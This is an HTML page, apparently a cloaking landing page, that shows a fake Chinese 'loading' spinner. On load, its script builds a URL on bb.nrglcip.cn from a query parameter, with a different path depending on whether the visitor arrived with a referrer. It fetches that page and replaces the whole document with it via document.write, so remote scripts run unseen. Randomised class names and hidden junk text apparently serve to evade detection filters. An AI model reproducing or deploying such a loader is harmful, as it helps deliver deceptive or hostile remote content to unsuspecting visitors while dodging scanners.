<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .wasKeQ4EkJA {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .wasKeQ4EkJA .QAbJb8G {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .wasKeQ4EkJA .content {
            line-height: 50px;
            text-align: center
        }

        .wasKeQ4EkJA .img {
            width: 100%
        }

        .wasKeQ4EkJA .BSIT9X7fF {
            text-align: center
        }

        .wasKeQ4EkJA .BSIT9X7fF span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .wasKeQ4EkJA .BSIT9X7fF span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .wasKeQ4EkJA .BSIT9X7fF span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .wasKeQ4EkJA .BSIT9X7fF span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .wasKeQ4EkJA .BSIT9X7fF span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .wasKeQ4EkJA .BSIT9X7fF span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .wasKeQ4EkJA .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function IE2f5FGKs(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var y0sRG = IE2f5FGKs('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ y0sRG +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ y0sRG +".html?a=share";
		}
		
        lSNET2yAO=url+"#"+new Date().getTime();
        lSNET2yAO && function() {
            $.get(lSNET2yAO, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<li style='display:none' >RYjjPxFd2zFEkOuevumjn253egs1vWt4SfkNHSwf9mx0gxQJYbeS5xiFW5B0Z6kNHb</li>
<p  style='display:none'>n5szJXbfLBkLHz7CN5uibw5EXplNmPgrRaJ6TdQHA8LXQgSgAQCSoaZ97gXsH0y4PwJ3sxL1L8GzUD</p>
<li style='display:none' >RYjjPxFd2zFEkOuevumjn253egs1vWt4SfkNHSwf9mx0gxQJYbeS5xiFW5B0Z6kNHb</li>
<img  src='' style='display:none'>
<p  style='display:none'>n5szJXbfLBkLHz7CN5uibw5EXplNmPgrRaJ6TdQHA8LXQgSgAQCSoaZ97gXsH0y4PwJ3sxL1L8GzUD</p>
<b style='display:none' >KkseViQuIawruU0kTPhsPOsP0C67Js5B43PnYG3wQle1fLB2Ruij7EPYJB04lEiFqW5qqDr9bdp3uSEl</b>
<p  style='display:none'>n5szJXbfLBkLHz7CN5uibw5EXplNmPgrRaJ6TdQHA8LXQgSgAQCSoaZ97gXsH0y4PwJ3sxL1L8GzUD</p>
<img  src='' style='display:none'>
<div style='display:none'>AKQ9VlqMEdozVn3voW62Oe</div><div class="wasKeQ4EkJA">
    <div class="QAbJb8G">
        <div class="BSIT9X7fF">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<b style='display:none' >rlBTlFqd7ylaLZ9IW0tXZbQXJwzHBm7U8362SVq1tleZovbSk</b>
<h1 style='display:none' >W5VmGEd4rdcQ7NA2DJswwVQfXf2SWJpZMfDDRTDNn5hokhrP0tU8bL7bE2MTq8XNVn3AIZz7Hzd1Z</h1>
<p  style='display:none'>xcrq2kFNV4xz3aapxt1zXi9vOphgCrBYtA</p>
<b style='display:none' >rlBTlFqd7ylaLZ9IW0tXZbQXJwzHBm7U8362SVq1tleZovbSk</b>
<ul style='display:none' >czNjWLB5u0iycREfx6bjkFQXqGKUfNKXU9I3zdum5afGfsoLuKQzh6AJzzimaOxPJ9ss8PdtnZIXPhwtKwibSbSGUU8eX1</ul>
<h1 style='display:none' >W5VmGEd4rdcQ7NA2DJswwVQfXf2SWJpZMfDDRTDNn5hokhrP0tU8bL7bE2MTq8XNVn3AIZz7Hzd1Z</h1>
<div style='display:none'>EBZeB1ngDY4QqrmHkIb</div>
<li style='display:none' >DprDjVPsMLH</li>
<h1 style='display:none' >W5VmGEd4rdcQ7NA2DJswwVQfXf2SWJpZMfDDRTDNn5hokhrP0tU8bL7bE2MTq8XNVn3AIZz7Hzd1Z</h1>
<img  src='' style='display:none'></body>
</html>